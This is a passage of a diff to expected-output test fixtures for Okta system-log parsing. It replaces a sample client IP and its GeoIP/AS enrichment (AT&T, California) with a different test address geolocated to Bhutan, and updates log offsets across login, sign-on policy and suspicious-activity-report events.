@@ -103,7 +99,7 @@ "event.id": "3aeede38-4f67-11ea-abd3-1f5d113f2546", "event.kind": "event", "event.module": "okta", - "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", + "event.original": 
"{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "event.outcome": "success", "event.type": [ "start", 
@@ -111,7 +107,7 @@
 ],
 "fileset.name": "system",
 "input.type": "log",
- "log.offset": 1665,
+ "log.offset": 1659,
 "okta.actor.alternate_id": "xxxxxx@elastic.co",
 "okta.actor.display_name": "xxxxxx",
 "okta.actor.id": "00u1abvz4pYqdM8ms4x6",
@@ -119,7 +115,7 @@
 "okta.authentication_context.authentication_step": 0,
 "okta.authentication_context.external_session_id": "102bZDNFfWaQSyEZQuDgWt-uQ",
 "okta.client.device": "Computer",
- "okta.client.ip": "108.255.197.247",
+ "okta.client.ip": "67.43.156.12",
 "okta.client.user_agent.browser": "FIREFOX",
 "okta.client.user_agent.os": "Mac OS X",
 "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
@@ -136,23 +132,19 @@
 "okta.transaction.type": "WEB",
 "okta.uuid": "3aeede38-4f67-11ea-abd3-1f5d113f2546",
 "related.ip": [
- "108.255.197.247"
+ "67.43.156.12"
 ],
 "related.user": [
 "xxxxxx"
 ],
 "service.type": "okta",
- "source.as.number": 7018,
- "source.as.organization.name": "AT&T Services, Inc.",
- "source.geo.city_name": "Dublin",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.7201,
- "source.geo.location.lon": -121.919,
- "source.geo.region_iso_code": "US-CA",
- "source.geo.region_name": "California",
- "source.ip": "108.255.197.247",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "source.user.full_name": "xxxxxx",
 "source.user.id": "00u1abvz4pYqdM8ms4x6",
 "tags": [
@@ -176,7 +168,7 @@
 "client.geo.location.lat": 37.7201,
 "client.geo.location.lon": -121.919,
 "client.geo.region_name": "California",
- "client.ip": "108.255.197.247",
+ "client.ip": "67.43.156.12",
 "client.user.full_name": "xxxxxx",
 "client.user.id": "00u1abvz4pYqdM8ms4x6",
 "event.action": "policy.evaluate_sign_on",
@@ -187,14 +179,14 @@ "event.id": "3af594f9-4f67-11ea-abd3-1f5d113f2546", "event.kind": "event", "event.module": "okta", - "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default 
Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", + "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "event.outcome": "success", "event.type": [ "info" ], "fileset.name": "system", "input.type": "log", - "log.offset": 3287, + "log.offset": 3275, "okta.actor.alternate_id": "xxxxxx@elastic.co", "okta.actor.display_name": "xxxxxx", "okta.actor.id": "00u1abvz4pYqdM8ms4x6", @@ -202,7 +194,7 @@ "okta.authentication_context.authentication_step": 0, "okta.authentication_context.external_session_id": "102bZDNFfWaQSyEZQuDgWt-uQ", "okta.client.device": "Computer", - "okta.client.ip": "108.255.197.247", + "okta.client.ip": "67.43.156.12", "okta.client.user_agent.browser": "FIREFOX", "okta.client.user_agent.os": "Mac OS X", "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", 
@@ -234,23 +226,19 @@
 "okta.transaction.type": "WEB",
 "okta.uuid": "3af594f9-4f67-11ea-abd3-1f5d113f2546",
 "related.ip": [
- "108.255.197.247"
+ "67.43.156.12"
 ],
 "related.user": [
 "xxxxxx"
 ],
 "service.type": "okta",
- "source.as.number": 7018,
- "source.as.organization.name": "AT&T Services, Inc.",
- "source.geo.city_name": "Dublin",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.7201,
- "source.geo.location.lon": -121.919,
- "source.geo.region_iso_code": "US-CA",
- "source.geo.region_name": "California",
- "source.ip": "108.255.197.247",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "source.user.full_name": "xxxxxx",
 "source.user.id": "00u1abvz4pYqdM8ms4x6",
 "tags": [
@@ -274,7 +262,7 @@
 "client.geo.location.lat": 37.7201,
 "client.geo.location.lon": -121.919,
 "client.geo.region_name": "California",
- "client.ip": "108.255.197.247",
+ "client.ip": "67.43.156.12",
 "client.user.full_name": "xxxxxx",
 "client.user.id": "00u1abvz4pYqdM8ms4x6",
 "event.action": "policy.evaluate_sign_on",
@@ -285,14 +273,14 @@ "event.id": "36a3b6b3-fcc0-47a0-96bd-95330cfdb658", "event.kind": "event", "event.module": "okta", - "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"\",\"requestUri\":\"\",\"threatSuspected\":\"false\",\"url\":\"\",\"suspiciousActivityBrowser\":\"browser\",\"suspiciousActivityEventCity\":\"New York City\",\"suspiciousActivityEventCountry\":\"United Sates\",\"suspiciousActivityEventId\":\"1234567\",\"suspiciousActivityEventIp\":\"10.50.14.5\",\"suspiciousActivityEventLatitude\":\"40.744960\",\"suspiciousActivityEventLongitude\":\"-73.988590\",\"suspiciousActivityEventState\":\"New York\",\"suspiciousActivityEventTransactionId\":\"12345678900\",\"suspiciousActivityEventType\":\"system.email.new_device_notification.sent_message\",\"suspiciousActivityOs\":\"Windows 10\",\"suspiciousActivityTimestamp\":\"2021-05-08T21:50:16.594Z\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in 
ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"36a3b6b3-fcc0-47a0-96bd-95330cfdb658\",\"version\":\"0\"}", + "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 
Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"\",\"requestUri\":\"\",\"threatSuspected\":\"false\",\"url\":\"\",\"suspiciousActivityBrowser\":\"browser\",\"suspiciousActivityEventCity\":\"New York City\",\"suspiciousActivityEventCountry\":\"United Sates\",\"suspiciousActivityEventId\":\"1234567\",\"suspiciousActivityEventIp\":\"10.50.14.5\",\"suspiciousActivityEventLatitude\":\"40.744960\",\"suspiciousActivityEventLongitude\":\"-73.988590\",\"suspiciousActivityEventState\":\"New York\",\"suspiciousActivityEventTransactionId\":\"12345678900\",\"suspiciousActivityEventType\":\"system.email.new_device_notification.sent_message\",\"suspiciousActivityOs\":\"Windows 10\",\"suspiciousActivityTimestamp\":\"2021-05-08T21:50:16.594Z\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"36a3b6b3-fcc0-47a0-96bd-95330cfdb658\",\"version\":\"0\"}", "event.outcome": 
"success",
 "event.type": [
 "info"
 ],
 "fileset.name": "system",
 "input.type": "log",
- "log.offset": 5218,
+ "log.offset": 5200,
 "okta.actor.alternate_id": "xxxxxx@elastic.co",
 "okta.actor.display_name": "xxxxxx",
 "okta.actor.id": "00u1abvz4pYqdM8ms4x6",
@@ -300,7 +288,7 @@
 "okta.authentication_context.authentication_step": 0,
 "okta.authentication_context.external_session_id": "102bZDNFfWaQSyEZQuDgWt-uQ",
 "okta.client.device": "Computer",
- "okta.client.ip": "108.255.197.247",
+ "okta.client.ip": "67.43.156.12",
 "okta.client.user_agent.browser": "FIREFOX",
 "okta.client.user_agent.os": "Mac OS X",
 "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
@@ -344,23 +332,19 @@
 "okta.transaction.type": "WEB",
 "okta.uuid": "36a3b6b3-fcc0-47a0-96bd-95330cfdb658",
 "related.ip": [
- "108.255.197.247"
+ "67.43.156.12"
 ],
 "related.user": [
 "xxxxxx"
 ],
 "service.type": "okta",
- "source.as.number": 7018,
- "source.as.organization.name": "AT&T Services, Inc.",
- "source.geo.city_name": "Dublin",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.7201,
- "source.geo.location.lon": -121.919,
- "source.geo.region_iso_code": "US-CA",
- "source.geo.region_name": "California",
- "source.ip": "108.255.197.247",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "source.user.full_name": "xxxxxx",
 "source.user.id": "00u1abvz4pYqdM8ms4x6",
 "tags": [
@@ -385,7 +369,7 @@ "client.geo.location.lat": 37.7201, "client.geo.location.lon": -121.919, "client.geo.region_name": "California", - "client.ip": "108.255.197.247", + "client.ip": "67.43.156.12", "client.user.full_name": "xxxxxx", "client.user.id": "00u1abvz4pYqdM8ms4x6", "event.action": "user.account.report_suspicious_activity_by_enduser", 
@@ -393,11 +377,11 @@ "event.id": "c2adb364-88d1-45a9-a620-2b64e44c5fcf", "event.kind": "event", "event.module": "okta", - "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"requestId\":\"\",\"requestUri\":\"\",\"suspiciousActivityBrowser\":\"browser\",\"suspiciousActivityEventCity\":\"New York City\",\"suspiciousActivityEventCountry\":\"United States\",\"suspiciousActivityEventId\":\"1234567\",\"suspiciousActivityEventIp\":\"10.50.14.5\",\"suspiciousActivityEventLatitude\":\"40.744960\",\"suspiciousActivityEventLongitude\":\"-73.988590\",\"suspiciousActivityEventState\":\"New York\",\"suspiciousActivityEventTransactionId\":\"12345678900\",\"suspiciousActivityEventType\":\"system.email.new_device_notification.sent_message\",\"suspiciousActivityOs\":\"Windows 10\",\"suspiciousActivityTimestamp\":\"2021-05-08T21:50:16.594Z\",\"url\":\"\"}},\"device\":null,\"displayMessage\":\"User report suspicious 
activity\",\"eventType\":\"user.account.report_suspicious_activity_by_enduser\",\"legacyEventType\":\"core.user.account.report_suspicious_activity_by_enduser\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":7018,\"asOrg\":\"AT&T Services, Inc.\",\"domain\":\"att.com\",\"isProxy\":false,\"isp\":\"AT&T Corp.\"},\"severity\":\"WARN\",\"target\":[{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"c2adb364-88d1-45a9-a620-2b64e44c5fcf\",\"version\":\"0\"}", + "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"requestId\":\"\",\"requestUri\":\"\",\"suspiciousActivityBrowser\":\"browser\",\"suspiciousActivityEventCity\":\"New York 
City\",\"suspiciousActivityEventCountry\":\"United States\",\"suspiciousActivityEventId\":\"1234567\",\"suspiciousActivityEventIp\":\"10.50.14.5\",\"suspiciousActivityEventLatitude\":\"40.744960\",\"suspiciousActivityEventLongitude\":\"-73.988590\",\"suspiciousActivityEventState\":\"New York\",\"suspiciousActivityEventTransactionId\":\"12345678900\",\"suspiciousActivityEventType\":\"system.email.new_device_notification.sent_message\",\"suspiciousActivityOs\":\"Windows 10\",\"suspiciousActivityTimestamp\":\"2021-05-08T21:50:16.594Z\",\"url\":\"\"}},\"device\":null,\"displayMessage\":\"User report suspicious activity\",\"eventType\":\"user.account.report_suspicious_activity_by_enduser\",\"legacyEventType\":\"core.user.account.report_suspicious_activity_by_enduser\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":7018,\"asOrg\":\"AT&T Services, Inc.\",\"domain\":\"att.com\",\"isProxy\":false,\"isp\":\"AT&T Corp.\"},\"severity\":\"WARN\",\"target\":[{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"c2adb364-88d1-45a9-a620-2b64e44c5fcf\",\"version\":\"0\"}", "event.outcome": "success", "fileset.name": "system", "input.type": "log", - "log.offset": 7707, + "log.offset": 7683, "okta.actor.alternate_id": "xxxxxx@elastic.co", "okta.actor.display_name": "xxxxxx", "okta.actor.id": "00u1abvz4pYqdM8ms4x6", 
@@ -405,7 +389,7 @@ "okta.authentication_context.authentication_step": 0, "okta.authentication_context.external_session_id": "102bZDNFfWaQSyEZQuDgWt-uQ", "okta.client.device": "Computer", - "okta.client.ip": "108.255.197.247", + "okta.client.ip": "67.43.156.12", "okta.client.user_agent.browser": "FIREFOX", "okta.client.user_agent.os": "Mac OS X", "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", @@ -443,24 +427,20 @@ "okta.transaction.type": "WEB", "okta.uuid": "c2adb364-88d1-45a9-a620-2b64e44c5fcf", "related.ip": [ - "108.255.197.247" + "67.43.156.12" ], "related.user": [ "xxxxxx" ], "service.type": "okta", - "source.as.number": 7018, - "source.as.organization.name": "AT&T Services, Inc.", + "source.as.number": 35908, "source.domain": "att.com", - "source.geo.city_name": "Dublin", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.7201, 